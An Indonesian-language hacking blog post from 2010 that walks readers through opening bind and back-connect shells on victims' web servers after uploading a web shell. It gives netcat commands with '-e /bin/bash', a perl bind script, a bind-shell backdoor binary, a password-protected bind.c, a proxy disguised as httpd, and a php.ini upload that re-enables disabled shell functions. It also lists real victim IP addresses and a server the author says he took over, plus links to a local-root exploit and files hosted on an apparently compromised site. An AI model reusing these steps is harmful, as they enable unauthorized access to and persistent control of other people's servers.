Kamis, 29 Juli 2010
perintah bind port menggunakan scipt perl bdp
caranya wget atw upload dulu file bdp k shell kalian
setalh masuk file bdp kalian k dalam shell, langkah selanjutnya adalah :
ketikan perintah ini d command shell kalian ===> perl bdp port(bebas mo pk port brp ajah) atw perl bdp 43856 | liat pd gambar bdp.PNG
d cmd atw konsole kalian ktikan perintah ini ===> nc -vv ip korban port / nc -vv 174.120.172.159 43856 | liat pd gambar bdp1.PNG
untuk port BEBAS, mo pk angka brp ajah dan berapa digit
semuanya ntu tergantung firewall korban, apakah d protek atw gg firewallnya, server korban
mksdnya, bisa bind atw bek konak.. dr server korban konak ke kompi kita
cara cari tau biar bisa bind atw bek konak semua server, k kompi kita, itu sebenernya ada
cm, gw lom tau caranya... ntu mah dah tingkat elite yg tau caranya
ni mah cara umum ajah yg gw kasih tau, maklom masih cupu gw coy
=====================================================================================
Perintah NC d command shell dan d cmd ataw console
sm halnya dng bdp perl, cm beda jnis file dah commadnya
wget atw upload dolo file NC k shell kalian, dah jgn lupa permnya kasih 777 atw 755
chmod 755 nc atw chmod 777 nc
perintah NC d shell pd kolom command, perintah tersebut gw dpt dr kawan gw v3n0m YCL(tutor videonya)
perintah di d command shell ====> ./nc -vv -l -p PORT -e /bin/bash | ./nc -vv -l -p 45689 -e /bin/bash | gambar nc.PNG
dan perintah d cmd atw console ====> nc -vv ip PORT | nc -vv 174.120.172.159 43856 | gambar nc1.PNG
untuk port BEBAS, mo pk angka brp ajah dan berapa digit
semuanya ntu tergantung firewall korban, apakah d protek atw gg firewallnya, server korban
mksdnya, bisa bind atw bek konak.. dr server korban konak ke kompi kita
cara cari tau biar bisa bind atw bek konak semua server, k kompi kita, itu sebenernya ada
cm, gw lom tau caranya... ntu mah dah tingkat elite yg tau caranya
ni mah cara umum ajah yg gw kasih tau, maklom masih cupu gw coy
=====================================================================================
:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::
sm halnya seperti BDP dan NC
wget atw upload file SHBD k shell kalian, dah jgn lupa permnya kasih 777 atw 755
chmod 755 shbd tw chmod 777 shbd
perintah SHBD d shell pd kolom command :
perintahnya ====> ./shbd port | ./shbd 12365 | gambar shbd.PNG
perintah SHBD d cmd atw console :
perintahnya ====> nc ip port | nc 174.120.172.159 12365 | gambar shbd1.PNG
untuk port BEBAS, mo pk angka brp ajah dan berapa digit
semuanya ntu tergantung firewall korban, apakah d protek atw gg firewallnya, server korban
mksdnya, bisa bind atw bek konak.. dr server korban konak ke kompi kita
cara cari tau biar bisa bind atw bek konak semua server, k kompi kita, itu sebenernya ada
cm, gw lom tau caranya... ntu mah dah tingkat elite yg tau caranya
ni mah cara umum ajah yg gw kasih tau, maklom masih cupu gw coy
=====================================================================================
bind via telnet putty protect password(video)
pass default ===> fkey
bind.c <=== mentah
compile dolo
klo d matengin dr gw, nti kalian gg bisa gonta-ganti port sm passnya, we :P
permnya d ubah dolo ya
kasih 755 atw 777
go...
./bind
buka putty
go....
no NC
file videoanya, bind.swf
semuanya ntu tergantung firewall korban, apakah d protek atw gg firewallnya, server korban
mksdnya, bisa bind atw bek konak.. dr server korban konak ke kompi kita
cara cari tau biar bisa bind atw bek konak semua server, k kompi kita, itu sebenernya ada
cm, gw lom tau caranya... ntu mah dah tingkat elite yg tau caranya
ni mah cara umum ajah yg gw kasih tau, maklom masih cupu gw coy
=====================================================================================
Back-Connection via SSH
tools nc
server connet to server(bukan k kompi gw)
maklumin gw ya, gw gg ngerti istilah²
pd dasarnya sm ajah, semua shell ituh... tergantung yang makai shellnya... :D
korban ====> 119.235.18.70
server4209x.masterweb.net 2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:09:10 EDT 2010 i686
server yg telah gw ambil ahli ===> 62.44.82.119
perintah tuk d ssh ====> nc -lvp59243
port ====> 59243
klo untuk port bebas mo pk berapa ajah
contoh yg ad d video
nm file videonya, connect.swf
semuanya ntu tergantung firewall korban, apakah d protek atw gg firewallnya, server korban
mksdnya, bisa bind atw bek konak.. dr server korban konak ke kompi kita
cara cari tau biar bisa bind atw bek konak semua server, k kompi kita, itu sebenernya ada
cm, gw lom tau caranya... ntu mah dah tingkat elite yg tau caranya
ni mah cara umum ajah yg gw kasih tau, maklom masih cupu gw coy
NB : klo yang server connet to server, gw lom tau ya(bru nyoba,imajinasi ajah)
apakah firewall bs tembus ap gg(server connet to server)
tolong d koreksi ya, kasih masukannya kawan-kawan
=====================================================================================
perintah add proxy
extrak dulu prox.tar.gz : tar zxvf prox.tar.gz
setelah d extrak, akan muncul 2 buah file : pro dah xh
perms nya d ubah dulu menjadi 777 ataw 755
contoh : chmod 755/777 pro dan chmod 755/777 xh
setelah permnya d ubah, langkah selanjutnya adalah ini
perintah buat proxy ===> ./xh -s "/usr/sbin/httpd" ./pro -a -d -p1945 <=== 1945 adalah portnya
NB : agar lebih optimal cr buat proxy ituh, harus bek konak atw bind
=====================================================================================
php.ini
upload atw wget dolo file php.ini k shell kalian
php.ini sm shell kalian, harus 1 direktory ya
gg boleh misah, klo misah gg ad hasilnya php.ini
fungsinya untuk meng-enable popenid sama function dan safe on
tp gg semuanaya bisa d enable, tergantung dr servernya
liat pd gambar berikut ini, | php.PNG
ketika saya mo cb wget sbuah file
d situ ad keterangannya " popen Disabled! "
User ID : popen Disabled!
Disabled Functions: show_source, system, shell_exec, passthru, exec, popen, proc_open, allow_url_fopen
gmn cr mengatasinya(gg smua server bisa)
cukup mengupload file php.ini
k site korban, nanti d situ akan terlihat perbedaanya
seblom d taruh file php.ini dah susah d taroh file php.ini | php1.PNG
file php.ini saya boleh nemu, ternyata pass saya coba, oh bgtuh hasilnya... ya, ya, ya....
=====================================================================================
klo mo xpl local root..
k byk-an orang² pd make(umum)
k sini ajah
http://www.securityfocus.com/bid/36038/exploit
=====================================================================================
THNX TO : devilzc0de + hashkiller + indonesian-cyber + yogyacarderlink + and you
=====================================================================================
written by : jh0nyrams0y a.k.a Hypn0t1z3
author by : c4uR
=====================================================================================
link gambar : http://islamiccenteremporia.org/wp-includes/pomo/.../bdp.PNG
: http://islamiccenteremporia.org/wp-includes/pomo/.../bdp1.PNG
lebih lengkapnya di mari gan : http://islamiccenteremporia.org/wp-includes/pomo/.../
Sumber : http://www.palk0n.co.cc/
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar